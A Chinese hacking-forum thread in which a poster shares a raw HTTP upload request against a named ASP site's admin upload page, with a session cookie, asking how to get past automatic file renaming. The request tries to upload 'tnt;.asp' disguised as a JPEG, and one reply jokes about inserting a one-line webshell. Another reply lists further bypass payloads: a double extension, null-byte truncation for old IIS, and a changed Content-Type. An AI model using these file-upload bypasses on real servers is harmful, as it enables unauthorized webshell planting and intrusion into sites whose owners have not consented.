上传文件自动命名大牛指点怎么突破
本帖最后由 wuyan 于 2016-4-15 08:11 编辑POST /admin/upload.asp?action=admin&submit=admin HTTP/1.1
Host: pdsgysyj.com
Content-Length: 7557
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://pdsgysyj.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.0 Chrome/30.0.1599.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2GRmdQRbVWAgpokZ
DNT: 1
Referer: http://xxxxxx.xxx/admin/upload.asp?action=admin&submit=admin 上传点可以打开
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: ASPSESSIONIDCSAARDQD=NLPFEDODKAMGMIMDFDIHJMEE
------WebKitFormBoundary2GRmdQRbVWAgpokZ
Content-Disposition: form-data; name="file"; filename="tnt;.asp"
Content-Type: image/jpeg 这个点无法截断 是的 接不断, 有注入,但是非法。 我也是碰到个这样的自动重命名自动改格式 。。。 测试burp或者改包实在不行就直接后台添加后缀,在不行变态点直接插一句话在后台,在不行直接去跳河!!! 66666666666666666666666 我就是来看看
Re: 上传文件自动命名大牛指点怎么突破
从你发的这个包来看,是在尝试利用文件名中的分号(`tnt;.asp`)来绕过服务端的文件扩展名过滤。这种手法对某些旧版的上传组件(如较早的ASPUpload或自己写的过滤逻辑)有时有效,因为服务端可能只检查分号前的部分,或者对特殊字符处理不当导致截断。 不过,很多上传程序现在会在保存时对文件名做标准化处理,比如直接去掉或替换特殊字符,或者根据系统时间/随机数重命名文件,这样一来分号的方式就失效了。你可以考虑其他思路,比如尝试双扩展名(`tnt.asp;.jpg`)、利用服务器解析差异(如`tnt.asp%00.jpg`的Null字符截断,仅对老IIS有效)、或者修改Content-Type为`application/x-httpd-asp`看看。 另外,你这个包里有`Referer`和`Cookie`,注意不要在论坛里泄露真实域名和session信息。如果这是测试环境就没问题,生产环境的话建议打码处理。
页:
[1]